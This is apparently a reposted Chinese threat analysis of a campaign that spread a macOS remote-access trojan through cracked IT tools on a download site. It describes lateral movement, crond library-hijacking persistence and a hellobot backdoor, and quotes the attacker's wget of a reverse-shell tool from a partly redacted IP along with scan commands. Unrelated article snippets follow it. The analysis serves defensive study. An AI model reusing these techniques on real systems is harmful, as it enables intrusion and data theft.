【暗蚊】黑客通过国内下载站传播Mac远控木马攻击活动分析

本文主要是介绍【暗蚊】黑客通过国内下载站传播Mac远控木马攻击活动分析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1.概述

近期,安天CERT发现一组利用非官方软件下载站进行投毒和攻击下游用户案例,并深入分析了攻击者在网管运维工具上捆绑植入macOS平台远控木马,利用国内非官方下载站发布,以此取得政企机构内部关键主机桥头堡,进行横向渗透的攻击活动。

2.详细情况

2.1 监测情况
安天CERT监测到“MACYY”下载站上SecureCRT、FinalShell、Navicat等五款运维工具含有恶意文件。如果在macOS操作系统的主机中执行上述工具便会加载恶意文件,连接攻击者C2服务器下载执行远控木马。安天CERT的分析人员在搜索站搜索 “Mac破解软件”等关键字时,该下载站在Google搜索站排名第一,在Bing搜索站排名第七。
在这里插入图片描述
该下载站Google搜索站排名第一

SecureCRT、FinalShell、Navicat、UltraEdit、Microsoft Remote Desktop共五款运维工具被植入恶意文件:在这里插入图片描述

感觉黑客渗透技术很酷,想自学却不知道从哪里入手?

在这里插入图片描述

3.攻击流程

被植入恶意文件的破解软件包含IT运维人员常用的SecureCRT、FinalShell、Navicat等五款运维工具。运维工具运行后连接攻击者C2服务器下载远控木马,该远控木马是攻击者基于开源跨平台KhepriC2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力。

3.1 初始访问攻击
由于攻击者在这五款运维工具中所采用的攻击方式一样,初始访问攻击以破解版的SecureCRT软件分析为例进行展开。攻击者将恶意文件libpng.dylib添加至破解版的SecureCRT软件中并将其投放至下载站。当用户运行该软件后,软件加载被植入的恶意文件libpng.dylib,连接攻击者搭建的C2服务器下载名为se01.log和bd.log两个加密载荷。libpng.dylib对se01.log文件解密后释放Mac远控木马,该木马是攻击者基于开源跨平台Khepri C2框架进行修改的远控木马,其主要功能有获取系统信息、进程管理、文件管理、远程Shell等,具备对感染主机进行远程控制的能力;libpng.dylib对bd.log文件解密后释放一个名为fseventsd的加载器,该加载器会将自身添加至开机启动项中,以实现持久化。截至安天CERT分析时该加载器用于下载其他载荷的URL已失效且未在公开情报系统中关联到,故无法分析其最终落地载荷。
在这里插入图片描述
步骤1:远控下载反向Shell工具

在受害者macOS操作系统主机中成功植入Khepri远控木马后,攻击者访问恶意软件服务器下载了一个基于开源跨平台工具goncat进行修改的木马,该木马的主要功能是实现反向Shell连接。攻击者下载goncat木马命令如下:

wget http://159.75.xxx.xxx:443/mac2

步骤2:文件窃取和分析

攻击者利用该木马将受害者macOS操作系统主机中的各类文件上传至匿名文件共享服务托管平台oshi.at上。攻击者基于所收集到的文件进行分析,为进一步的横向移动做准备。

步骤3:内网网络扫描

攻击者下载了fscan、nmap等扫描工具,并使用nmap网络扫描工具对开放了22端口的主机进行扫描。此外,攻击者还利用fscan扫描工具对内网进行了扫描,以获取内网更多服务器和主机的信息,包括主机存活信息、端口信息、常见服务信息、Windows网卡信息、Web指纹信息以及域控信息等。使用nmap工具扫描某网段命令如下所示:

nmap -Pn -p22 -oG - 172.xx.xx.xxx/24

步骤4:使用多种渗透手段:

攻击者利用Web漏洞和SSH暴力破解等手段来获取受害者更多的服务器和主机访问权限。使用ssh登陆某服务器命令如下:

ssh xxxxx@172.xx.xx.xxx

步骤5:部署后门进行持久化

攻击者会访问恶意软件服务器下载一个名为centos7的文件,该文件运行后会在当前路径下释放一个名为libdb.so.2的文件,利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,加载执行恶意文件libdb.so.2。经分析发现libdb.so.2文件为hellobot后门,该后门主要功能有文件管理、远程Shell、端口扫描、服务代理等。下载Centos7文件

1. 本次事件针对IT运维人员,且工具名称和使用的域名相似

攻击者在下载站中上传的破解软件SecureCRT、Ultraedit、Microsoft-Remote-Desktop-Beta、FinalShell、Navicat,都是IT运维人员日常使用频次较高的软件工具,且都被归于该网站的“服务器运维”类别中,表明攻击者有针对性地对IT运维人员进行攻击。

2. 使用crond服务持久化和后门动态链接库手法与友商披露类似

本次攻击活动中攻击者在内网Linux机器上访问恶意软件服务器下载一个名为centos7的文件,该文件运行后会在当前路径下释放一个名为libdb.so.2的文件,利用libdb.so.2文件对crond服务动态库文件进行劫持,然后将libdb.so.2文件及crond的时间属性值修改为/bin/ls的时间,最后重新启动crond服务,加载执行恶意文件libdb.so.2。其中使用crond服务持久化和后门动态链接库手法类似。

3. 最终载荷使用的恶意域名amdc6766.net相同

在本次攻击活动中,攻击者在内网Linux机器上使用的最终载荷为hellobot后门,其外联域名为Microsoft.amdc6766.net,与友商分析报告中披露的恶意域名相同。

这篇关于【暗蚊】黑客通过国内下载站传播Mac远控木马攻击活动分析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/626610

相关文章

性能分析之MySQL索引实战案例

文章目录 一、前言二、准备三、MySQL索引优化四、MySQL 索引知识回顾五、总结 一、前言 在上一讲性能工具之 JProfiler 简单登录案例分析实战中已经发现SQL没有建立索引问题,本文将一起从代码层去分析为什么没有建立索引? 开源ERP项目地址:https://gitee.com/jishenghua/JSH_ERP 二、准备 打开IDEA找到登录请求资源路径位置

SWAP作物生长模型安装教程、数据制备、敏感性分析、气候变化影响、R模型敏感性分析与贝叶斯优化、Fortran源代码分析、气候数据降尺度与变化影响分析

查看原文>>>全流程SWAP农业模型数据制备、敏感性分析及气候变化影响实践技术应用 SWAP模型是由荷兰瓦赫宁根大学开发的先进农作物模型,它综合考虑了土壤-水分-大气以及植被间的相互作用;是一种描述作物生长过程的一种机理性作物生长模型。它不但运用Richard方程,使其能够精确的模拟土壤中水分的运动,而且耦合了WOFOST作物模型使作物的生长描述更为科学。 本文让更多的科研人员和农业工作者

MOLE 2.5 分析分子通道和孔隙

软件介绍 生物大分子通道和孔隙在生物学中发挥着重要作用,例如在分子识别和酶底物特异性方面。 我们介绍了一种名为 MOLE 2.5 的高级软件工具,该工具旨在分析分子通道和孔隙。 与其他可用软件工具的基准测试表明,MOLE 2.5 相比更快、更强大、功能更丰富。作为一项新功能,MOLE 2.5 可以估算已识别通道的物理化学性质。 软件下载 https://pan.quark.cn/s/57

衡石分析平台使用手册-单机安装及启动

单机安装及启动​ 本文讲述如何在单机环境下进行 HENGSHI SENSE 安装的操作过程。 在安装前请确认网络环境,如果是隔离环境,无法连接互联网时,请先按照 离线环境安装依赖的指导进行依赖包的安装,然后按照本文的指导继续操作。如果网络环境可以连接互联网,请直接按照本文的指导进行安装。 准备工作​ 请参考安装环境文档准备安装环境。 配置用户与安装目录。 在操作前请检查您是否有 sud

线性因子模型 - 独立分量分析(ICA)篇

序言 线性因子模型是数据分析与机器学习中的一类重要模型,它们通过引入潜变量( latent variables \text{latent variables} latent variables)来更好地表征数据。其中,独立分量分析( ICA \text{ICA} ICA)作为线性因子模型的一种,以其独特的视角和广泛的应用领域而备受关注。 ICA \text{ICA} ICA旨在将观察到的复杂信号

mac安装brew 与 HomeBrew

/bin/zsh -c "$(curl -fsSL https://gitee.com/cunkai/HomebrewCN/raw/master/Homebrew.sh)" curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh >> brew_install BREW_REPO="

【软考】希尔排序算法分析

目录 1. c代码2. 运行截图3. 运行解析 1. c代码 #include <stdio.h>#include <stdlib.h> void shellSort(int data[], int n){// 划分的数组,例如8个数则为[4, 2, 1]int *delta;int k;// i控制delta的轮次int i;// 临时变量,换值int temp;in

三相直流无刷电机(BLDC)控制算法实现:BLDC有感启动算法思路分析

一枚从事路径规划算法、运动控制算法、BLDC/FOC电机控制算法、工控、物联网工程师,爱吃土豆。如有需要技术交流或者需要方案帮助、需求:以下为联系方式—V 方案1:通过霍尔传感器IO中断触发换相 1.1 整体执行思路 霍尔传感器U、V、W三相通过IO+EXIT中断的方式进行霍尔传感器数据的读取。将IO口配置为上升沿+下降沿中断触发的方式。当霍尔传感器信号发生发生信号的变化就会触发中断在中断

速盾高防cdn是怎么解决网站攻击的?

速盾高防CDN是一种基于云计算技术的网络安全解决方案,可以有效地保护网站免受各种网络攻击的威胁。它通过在全球多个节点部署服务器,将网站内容缓存到这些服务器上,并通过智能路由技术将用户的请求引导到最近的服务器上,以提供更快的访问速度和更好的网络性能。 速盾高防CDN主要采用以下几种方式来解决网站攻击: 分布式拒绝服务攻击(DDoS)防护:DDoS攻击是一种常见的网络攻击手段,攻击者通过向目标网

kubelet组件的启动流程源码分析

概述 摘要: 本文将总结kubelet的作用以及原理,在有一定基础认识的前提下,通过阅读kubelet源码,对kubelet组件的启动流程进行分析。 正文 kubelet的作用 这里对kubelet的作用做一个简单总结。 节点管理 节点的注册 节点状态更新 容器管理(pod生命周期管理) 监听apiserver的容器事件 容器的创建、删除(CRI) 容器的网络的创建与删除